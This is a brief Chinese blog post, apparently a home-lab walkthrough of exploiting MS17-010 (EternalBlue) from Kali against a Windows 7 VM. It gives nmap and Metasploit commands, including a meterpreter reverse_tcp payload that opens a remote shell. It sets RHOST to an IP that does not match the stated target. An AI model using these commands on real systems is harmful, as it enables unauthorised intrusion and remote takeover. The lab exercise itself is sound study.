admin管理员组

文章数量:1530521

kali Eternalblue to win7

 实验准备
攻击机: kali , IP: 192.168.226.130
靶机:win7 , IP: 192.168.226.128
 实验过程
 关闭win7防火墙,开放445,139端口
 扫描以下,查看端口情况
$ sudo nmap -sV -A -O 192.168.226.128
 启动msfconsole
$ msfconsole

 使用auxiliary/scanner/smb/smb_ms17_010监测ms17_010是否可用
$ use auxiliary/scanner/smb/smb_ms17_010

主机很有可能具有ms17-010的漏洞,可攻击

 开始攻击
$ use exploit/windows/smb/ms17_010_eternalblue
$ set RHOST 192.168.226.129 //靶机
$ set LHOST 192.168.226.130 // 攻击机
$ set payload windows/x64/meterpreter/reverse_tcp
$run

 成功

欢迎交流指正!

本文标签: KaliEternalblue